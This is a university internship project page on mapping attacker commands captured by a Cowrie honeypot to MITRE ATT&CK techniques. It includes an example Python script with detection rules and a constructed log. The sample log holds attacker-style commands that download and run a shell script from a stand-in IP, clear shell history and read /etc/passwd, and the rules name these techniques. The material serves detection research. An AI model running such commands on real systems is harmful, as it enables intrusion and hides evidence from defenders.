
Automating Attack Techniques to the MITRE ATT&CK Framework

Research Group Activity

In recent years threat intelligence frameworks such as MITRE ATT&CK have given the cybersecurity industry a common lexicon and have allowed the tactics and techniques used by attackers to be classified and profiled effectively. Profiling attackers and their techniques against the framework is slow, however, because of the volume of data that has to be sorted and inspected, even though the intelligence gained from doing so can be invaluable to organizations in deciding how to counter and respond to the threats they face. Honeypots, meanwhile, have long provided a way to observe and monitor attackers, but without manual intervention the behaviours and techniques that could be harvested from attacker interactions go unscrutinised. Automating that analysis would cut the time an analyst spends wading through captured data and would yield actionable threat intelligence, especially when coupled with a knowledge base of adversary techniques such as MITRE ATT&CK. The ability to map observed attacker behaviours and techniques automatically onto the common lexicon of MITRE ATT&CK could give organizations a way to reduce the substantial resources that threat intelligence currently demands.

Project Description

The project aims to address the following question: "Can honeypots be automated in a manner that allows commands executed inside them to be detected automatically and attributed correctly to the MITRE ATT&CK framework?"
The project will involve developing a framework, or extending existing mechanisms, to automate the analysis of captured honeypot data so that attacker commands can be fingerprinted and mapped correctly to MITRE ATT&CK techniques, and then establishing and assessing the accuracy of the collected fingerprints against the MITRE ATT&CK techniques they are meant to identify.
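As an added illustration of the pipeline the project describes (this is example code written for this page, not code from the project or from Cowrie), the script below consumes Cowrie-style JSON log lines, fingerprints each cowrie.command.input event against a small rule set whose metadata carries an ATT&CK technique ID, aggregates the techniques per honeypot session, and scores the result against a hand-labelled ground truth. The rules are plain Python regexes standing in for YARA rules (the page mentions YARA; using yara-python would replace the RULES table and the regex search with rule metadata and rule.match). The log lines and the ground-truth labels are constructed for the example; the technique IDs are real ATT&CK identifiers.

```python
"""Map commands captured by a Cowrie honeypot to MITRE ATT&CK techniques.

Added example for this page. Rules are regexes over the Cowrie 'input' field,
standing in for YARA rules with an ATT&CK id in their metadata. The log lines
below are constructed in the shape of Cowrie's cowrie.json output, not captures.
"""
import json
import re
from collections import defaultdict

# Hypothetical rule set: (rule name, ATT&CK technique id, regex over one sub-command).
RULES = [
    ("sys_info_discovery",    "T1082",     r"^\s*(uname\b|cat\s+/proc/cpuinfo|lscpu\b|nproc\b)"),
    ("user_discovery",        "T1033",     r"^\s*(whoami|id)\b"),
    ("process_discovery",     "T1057",     r"^\s*ps\b"),
    ("net_config_discovery",  "T1016",     r"^\s*(ifconfig\b|ip\s+(a|addr)\b)"),
    ("ingress_tool_transfer", "T1105",     r"^\s*(wget|curl)\b.*https?://"),
    ("cron_persistence",      "T1053.003", r"\bcrontab\b"),
    ("clear_history",         "T1070.003", r"(history\s+-c|rm\b[^;|&]*\.bash_history|unset\s+HISTFILE)"),
    ("file_deletion",         "T1070.004", r"^\s*rm\s+-rf?\b"),
    ("create_local_account",  "T1136.001", r"^\s*(useradd|adduser)\b"),
    ("unix_shell",            "T1059.004", r"^\s*(sh|bash|dash)\b"),
]
COMPILED = [(name, tid, re.compile(pat)) for name, tid, pat in RULES]


def split_compound(command):
    """Cowrie logs the whole line the attacker typed; split on ; && || and |
    so each sub-command is matched on its own (a real shell parser would do more)."""
    return [p.strip() for p in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command) if p.strip()]


def techniques_for_command(command):
    """Return the set of ATT&CK ids whose rules fire on any part of the command."""
    hits = set()
    for part in split_compound(command):
        for _name, tid, rx in COMPILED:
            if rx.search(part):
                hits.add(tid)
    return hits


def map_cowrie_log(lines):
    """Consume Cowrie JSON log lines; return {session: set of technique ids}.
    Only cowrie.command.input events carry an attacker command; other events
    (connects, login attempts) and unparseable lines are skipped, not fatal."""
    per_session = defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("eventid") != "cowrie.command.input":
            continue
        per_session[ev["session"]] |= techniques_for_command(ev.get("input", ""))
    return dict(per_session)


def score(predicted, truth):
    """Micro-averaged precision and recall of predicted technique ids against
    an analyst's ground truth; both are {session: set of technique ids}."""
    tp = fp = fn = 0
    for session in set(predicted) | set(truth):
        p, t = predicted.get(session, set()), truth.get(session, set())
        tp += len(p & t)
        fp += len(p - t)
        fn += len(t - p)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall


# Constructed sample in the shape of cowrie.json (fields trimmed to those used here).
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","session":"s1","src_ip":"203.0.113.5","timestamp":"2024-01-01T00:00:00Z"}
{"eventid":"cowrie.command.input","session":"s1","input":"uname -a; whoami","timestamp":"2024-01-01T00:00:01Z"}
{"eventid":"cowrie.command.input","session":"s1","input":"cd /tmp && wget http://198.51.100.7/x.sh -O x.sh && sh x.sh","timestamp":"2024-01-01T00:00:02Z"}
{"eventid":"cowrie.command.input","session":"s1","input":"rm -rf /tmp/x.sh; history -c","timestamp":"2024-01-01T00:00:03Z"}
{"eventid":"cowrie.command.input","session":"s2","input":"crontab -l","timestamp":"2024-01-01T00:05:00Z"}
{"eventid":"cowrie.command.input","session":"s2","input":"cat /etc/passwd","timestamp":"2024-01-01T00:05:01Z"}
{"eventid":"cowrie.login.failed","session":"s3","username":"root","password":"123456","timestamp":"2024-01-01T00:06:00Z"}
this line is deliberately not JSON
"""

# Hand-labelled truth for the constructed sessions. 'cat /etc/passwd' is
# labelled T1087.001 (Account Discovery: Local Account) but no rule covers it,
# so the rule set misses it and recall drops below 1.0.
GROUND_TRUTH = {
    "s1": {"T1082", "T1033", "T1105", "T1059.004", "T1070.004", "T1070.003"},
    "s2": {"T1053.003", "T1087.001"},
}

if __name__ == "__main__":
    predicted = map_cowrie_log(SAMPLE_LOG.splitlines())
    for session, tids in sorted(predicted.items()):
        print(session, sorted(tids))
    print("precision=%.3f recall=%.3f" % score(predicted, GROUND_TRUTH))
```

Scoring against a labelled ground truth is what turns a rule set into a measurable fingerprint: the constructed run above reports perfect precision but a recall of 0.875, pointing straight at the command the rules do not cover. In practice the ground truth would be a sample of real sessions labelled by an analyst, and false positives (for example a rule firing on a benign `id` inside an unrelated command) show up as a drop in precision.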

Required Skills

Understanding of MITRE ATT&CK framework is desirable but not essential.
Experience in deploying and maintaining honeypots (Cowrie) is desirable but not essential.
Experience of using Docker is desirable but not essential.
Experience of coding in Python and using the YARA Python library is desirable but not essential.

Apply for this Project

If you wish to apply for this project, fill in the form below and upload your CV and a personal statement explaining why you want to do this particular internship project. Attachments must be in PDF format.

Privacy notice
The data on this form will be used as part of your application. The date and time of your application, and your identity (where submitted) will also be stored, but will not be used for any purpose other than administering this application.

The University of Warwick is the Data Controller of any information you have entered on this form and is committed to protecting the rights of individuals in line with Data Protection Legislation. The University's Data Protection webpages provide further information on your rights and how the University processes personal data. If you wish to submit a data subject rights request, make a complaint or report a suspected personal data breach, please contact the University's Data Protection Officer by email at infocompliance@warwick.ac.uk.
